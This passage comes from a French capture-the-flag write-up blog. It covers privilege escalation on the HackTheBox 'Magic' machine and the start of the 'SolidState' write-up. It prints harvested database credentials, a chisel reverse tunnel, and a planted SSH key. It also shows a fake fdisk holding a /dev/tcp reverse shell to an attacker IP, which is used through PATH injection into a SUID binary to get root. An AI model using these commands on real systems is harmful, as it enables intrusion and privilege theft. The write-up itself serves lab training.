class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">www-data@magic:/$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">9828</span> suspended nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">$ stty raw -echo<span class="p">;</span><span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">9828</span> continued nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@magic:/$ whoami </span></span><span class="line"><span class="cl">www-data </span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql-creds--dbphp5">mysql creds : db.php5 </h3><p>On trouve un fichier de base de donnée avec db.php5</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ cat db.php5 </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">class Database </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbName</span> <span class="o">=</span> <span class="s1">&#39;Magic&#39;</span> <span class="p">;</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbHost</span> <span class="o">=</span> <span class="s1">&#39;localhost&#39;</span> <span class="p">;</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbUsername</span> <span class="o">=</span> <span class="s1">&#39;theseus&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbUserPassword</span> <span class="o">=</span> <span class="s1">&#39;iamkingtheseus&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql-connection-chisel-port-forwarding--admin-creds">Mysql connection (chisel port forwarding) : admin creds </h3><p>On remarque que le port mysql est bien ouvert (3306), cependant, l&rsquo;outil <strong>mysql</strong> n&rsquo;est pas installé et on ne peut pas se connecter à la base de donnée :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ ss -lntp </span></span><span class="line"><span class="cl">State Recv-Q Send-Q Local Address:Port Peer Address:Port </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">80</span> 127.0.0.1:3306 0.0.0.0:* </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ mysql </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Command <span class="s1">&#39;mysql&#39;</span> not found, but can be installed with: </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Pour contourner cela, j&rsquo;ai décidé d&rsquo;utiliser <strong>chisel</strong> pour faire du <strong>port forwarding</strong>. Le but étant d&rsquo;accéder au port 3306 du serveur depuis ma machine hôte. Pour faire cela, il suffit de telecharger le binaire chisel sur la page github. Voici les commandes à effectuer:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ wget http://10.10.16.2/chisel </span></span><span class="line"><span class="cl">--2025-07-24 07:00:58-- http://10.10.16.2/chisel </span></span><span class="line"><span class="cl">Connecting to 10.10.16.2:80... connected. </span></span><span class="line"><span class="cl">HTTP request sent, awaiting response... <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Length: <span class="m">9371800</span> <span class="o">(</span>8.9M<span class="o">)</span> <span class="o">[</span>application/octet-stream<span class="o">]</span> </span></span><span class="line"><span class="cl">Saving to: <span class="s1">&#39;chisel&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">chisel 100%<span class="o">[===================</span>&gt;<span class="o">]</span> 8.94M 336KB/s in 26s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025-07-24 07:01:25 <span class="o">(</span><span class="m">351</span> KB/s<span class="o">)</span> - <span class="s1">&#39;chisel&#39;</span> saved <span class="o">[</span>9371800/9371800<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">3306data@magic:/var/www/Magic$ ./chisel client 10.10.16.2:1082 R:3306:localhost:3306 &gt; /dev/null 2&gt; /dev/null <span class="p">&amp;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> <span class="m">5146</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ./chisel server -p <span class="m">1082</span> --reverse </span></span><span class="line"><span class="cl">2025/07/24 16:02:12 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/07/24 16:02:12 server: Fingerprint 4PDYwTjgAniyianMIlBvt3QRTZm4VpYL+kFf1nXfQPg<span class="o">=</span> </span></span><span class="line"><span class="cl">2025/07/24 16:02:12 server: Listening on http://0.0.0.0:1082 </span></span><span class="line"><span class="cl">2025/07/24 16:03:19 server: session#1: tun: proxy#R:3306<span class="o">=</span>&gt;localhost:3306: Listening </span></span></code></pre></td></tr></table> </div> </div><p>Depuis ma machine hôte, j&rsquo;utilise la commande <strong>mysql</strong> pour me connecter a mon port local 3306 qui est forward vers le port 3306 du serveur. On trouve alors une database &ldquo;Magic&rdquo; et une table &ldquo;login&rdquo; contenant les credentials suivants: admin : <code>Th3s3usW4sK1ng</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ mysql -h 127.0.0.1 -P <span class="m">3306</span> -u theseus -p </span></span><span class="line"><span class="cl">Enter password: </span></span><span class="line"><span class="cl">Welcome to the MariaDB monitor. Commands end with <span class="p">;</span> or <span class="se">\g</span>. </span></span><span class="line"><span class="cl">Your MySQL connection id is <span class="m">25</span> </span></span><span class="line"><span class="cl">Server version: 5.7.29-0ubuntu0.18.04.1 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> 2000, 2018, Oracle, MariaDB Corporation Ab and others. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Type <span class="s1">&#39;help;&#39;</span> or <span class="s1">&#39;\h&#39;</span> <span class="k">for</span> help. Type <span class="s1">&#39;\c&#39;</span> to clear the current input statement. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MySQL <span class="o">[(</span>none<span class="o">)]</span>&gt; show databases<span class="p">;</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Database <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> information_schema <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Magic <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="m">2</span> rows in <span class="nb">set</span> <span class="o">(</span>0.145 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MySQL <span class="o">[(</span>none<span class="o">)]</span>&gt; use Magic<span class="p">;</span> </span></span><span class="line"><span class="cl">Reading table information <span class="k">for</span> completion of table and column names </span></span><span class="line"><span class="cl">You can turn off this feature to get a quicker startup with -A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database changed </span></span><span class="line"><span class="cl">MySQL <span class="o">[</span>Magic<span class="o">]</span>&gt; show tables<span class="p">;</span> </span></span><span class="line"><span class="cl">+-----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Tables_in_Magic <span class="p">|</span> </span></span><span class="line"><span class="cl">+-----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> login <span class="p">|</span> </span></span><span class="line"><span class="cl">+-----------------+ </span></span><span class="line"><span class="cl"><span class="m">1</span> row in <span class="nb">set</span> <span class="o">(</span>0.136 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MySQL <span class="o">[</span>Magic<span class="o">]</span>&gt; <span class="k">select</span> * from login<span class="p">;</span> </span></span><span class="line"><span class="cl">+----+----------+----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> username <span class="p">|</span> password <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1</span> <span class="p">|</span> admin <span class="p">|</span> Th3s3usW4sK1ng <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+----------------+ </span></span><span class="line"><span class="cl"><span class="m">1</span> row in <span class="nb">set</span> <span class="o">(</span>0.106 sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="theseus-user--su">theseus user : su </h3><p>On se connecte en tant que <strong>theseus</strong> avec le mot de passe trouvé précédemment. Cependant, ssh ne fonctionne qu&rsquo;avec une paire de clé publique.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ su theseus </span></span><span class="line"><span class="cl">Password: &lt;---- Th3s3usW4sK1ng </span></span><span class="line"><span class="cl">theseus@magic:/var/www/Magic$ cat /home/theseus/user.txt </span></span><span class="line"><span class="cl">6553.....4c7a </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh--theseus">SSH : theseus </h3><p>Pour obtenir un shell plus stable, j&rsquo;ai généré une paire de clé <strong>RSA</strong> et j&rsquo;ai ajouté la clé publique dans le fichier <strong>authorized_keys</strong>. Ensuite il suffit de copier le clé privé et de la mettre sur ma machine hôte, puis d&rsquo;effectuer une connexion ssh :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~$ ssh-keygen -t rsa </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter file in which to save the key <span class="o">(</span>/home/theseus/.ssh/id_rsa<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in /home/theseus/.ssh/id_rsa. </span></span><span class="line"><span class="cl">Your public key has been saved in /home/theseus/.ssh/id_rsa.pub. </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">theseus@magic:~$ <span class="nb">cd</span> .ssh </span></span><span class="line"><span class="cl">theseus@magic:~/.ssh$ cat id_rsa.pub &gt; authorized_keys </span></span><span class="line"><span class="cl">theseus@magic:~/.ssh$ cat id_rsa </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="c1">## [Ctrl-C, Ctrl-V] --&gt; copie de la clé privée sur la machine hôte</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ vim theseus.key </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> theseus.key </span></span><span class="line"><span class="cl">$ ssh theseus@10.10.10.185 -i theseus.key </span></span><span class="line"><span class="cl">Welcome to Ubuntu 18.04.4 LTS <span class="o">(</span>GNU/Linux 5.3.0-42-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">theseus@magic:~$ whoami </span></span><span class="line"><span class="cl">theseus </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="suid-binary--binsysinfo">SUID binary : /bin/sysinfo </h3><p>On découvre que le binaire &ldquo;/bin/sysinfo&rdquo; a le bit SUID activé, grâce à l&rsquo;énumeration avec <strong>linpeas</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~$ cat linpeas.out <span class="p">|</span> grep -i SUID </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">╔══════════╣ SUID - Check easy privesc, exploits and write perms </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">-rwsr-x--- <span class="m">1</span> root users 22K Oct <span class="m">21</span> <span class="m">2019</span> /bin/sysinfo <span class="o">(</span>Unknown SUID binary!<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="fdisk-execution-in-binsysinfo">fdisk execution in /bin/sysinfo </h3><p>Pour faire une attaque &ldquo;PATH injection&rdquo; sur le binaire <strong>SUID</strong>, j&rsquo;ai pu utiliser strace, ltrace ou encore <strong>strings</strong>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~/bin$ strings /bin/sysinfo <span class="p">|</span> less </span></span><span class="line"><span class="cl">/lib64/ld-linux-x86-64.so.2 </span></span><span class="line"><span class="cl">libstdc++.so.6 </span></span><span class="line"><span class="cl">__gmon_start__ </span></span><span class="line"><span class="cl">_ITM_deregisterTMCloneTable </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">====================</span>Hardware <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">lshw -short </span></span><span class="line"><span class="cl"><span class="o">====================</span>Disk <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">fdisk -l </span></span><span class="line"><span class="cl"><span class="o">====================</span>CPU <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">cat /proc/cpuinfo </span></span><span class="line"><span class="cl"><span class="o">====================</span>MEM <span class="nv">Usage</span><span class="o">=====================</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On observe l&rsquo;execution de lshw, fdisk ou encore cat, sans le path absolu. Ex: /bin/cat. On peut donc faire une PATH injection. J&rsquo;ai choisi de le faire avec fdisk.</p> <h3 id="creating-fake-fdisk-binary-with-reverse-shell">Creating fake &ldquo;fdisk&rdquo; binary with reverse shell </h3><p>On crée un faux binaire <strong>fdisk</strong> dans le dossier <strong>bin/</strong> qu&rsquo;on ajoute ensuite au <strong>PATH</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~$ mkdir bin<span class="p">;</span><span class="nb">cd</span> bin </span></span><span class="line"><span class="cl">theseus@magic:~/bin$ nano fdisk </span></span><span class="line"><span class="cl"><span class="c1">##!/bin/bash</span> </span></span><span class="line"><span class="cl">bash -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.16.2/1337 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl">theseus@magic:~/bin$ <span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span><span class="s2">&#34;/home/theseus/bin:</span><span class="nv">$PATH</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-shell-using-path-injection">Root shell using PATH injection </h3><p>On execute ensuite le binaire /bin/sysinfo, qui va executer la commande <strong>fdisk</strong> en tant que root. Comme mon dossier <strong>bin</strong> contient aussi un binaire fdisk, ET qu&rsquo;il est en en premier dans la liste des dossiers du PATH, alors le programme va décider de l&rsquo;executer à la place du véritable binaire :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~/bin$ /bin/sysinfo </span></span><span class="line"><span class="cl"><span class="o">====================</span>Hardware <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl">H/W path Device Class <span class="nv">Description</span> </span></span><span class="line"><span class="cl"><span class="o">====================================================</span> </span></span><span class="line"><span class="cl"> system VMware Virtual Platform </span></span><span class="line"><span class="cl">/0 bus 440BX Desktop Reference Platform </span></span><span class="line"><span class="cl">/0/0 memory 86KiB BIOS </span></span><span class="line"><span class="cl">/0/1 processor AMD EPYC <span class="m">7763</span> 64-Core Processor </span></span><span class="line"><span class="cl">/0/1/0 memory 16KiB L1 cache </span></span><span class="line"><span class="cl">/0/1/1 memory 16KiB L1 cache </span></span><span class="line"><span class="cl">/0/1/2 memory 512KiB L2 cache </span></span><span class="line"><span class="cl">/0/1/3 memory 512KiB L2 cache </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">====================</span>Disk <span class="nv">Info</span><span class="o">====================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185:48804. </span></span><span class="line"><span class="cl">root@magic:~/bin# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@magic:~# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@magic:/root# cat root.txt </span></span><span class="line"><span class="cl">c21a.....fa6b </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/solidstate-htb/Tue, 22 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/solidstate-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="SolidState cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">SolidState</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.51</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mindy : P@55W0rd1!2@ </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.51 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.4p1 Debian 10+deb9u1 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 770084f578b9c7d354cf712e0d526d8b <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 78b83af660190691f553921d3f48ed53 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e445e9ed074d7369435a12709dc4af76 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY </span></span><span class="line"><span class="cl">25/tcp open smtp syn-ack ttl <span class="m">63</span> JAMES smtpd 2.3.2 </span></span><span class="line"><span class="cl"><span class="p">|</span>_smtp-commands: solidstate Hello nmap.scanme.org <span class="o">(</span>10.10.14.3 <span class="o">[</span>10.10.14.3<span class="o">])</span> </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.25 <span class="o">((</span>Debian<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: OPTIONS HEAD GET POST </span></span><span class="line"><span class="cl">110/tcp open pop3 syn-ack ttl <span class="m">63</span> JAMES pop3d 2.3.2 </span></span><span class="line"><span class="cl">119/tcp open nntp syn-ack ttl <span class="m">63</span> JAMES nntpd <span class="o">(</span>posting ok<span class="o">)</span> </span></span><span class="line"><span class="cl">4555/tcp open rsip? syn-ack ttl <span class="m">63</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> GenericLines: </span></span><span class="line"><span class="cl"><span class="p">|</span> JAMES Remote Administration Tool 2.3.2 </span></span><span class="line"><span class="cl"><span class="p">|</span> Please enter your login and password </span></span><span class="line"><span class="cl"><span class="p">|</span> Login id: </span></span><span class="line"><span class="cl"><span class="p">|</span> Password: </span></span><span class="line"><span class="cl"><span class="p">|</span> Login failed <span class="k">for</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Login id: </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="james-remote-administration-tool-232-port-5557">JAMES Remote Administration Tool 2.3.2 (port 5557) </h3><p>On observe un service tournant sur le port 5557, demandant un user/password. En cherchant sur internet, on trouve des credentials par défaut pour cet outil : root / root</p> <p>On peut alors lister les users, et changer leur mot de passe permettant 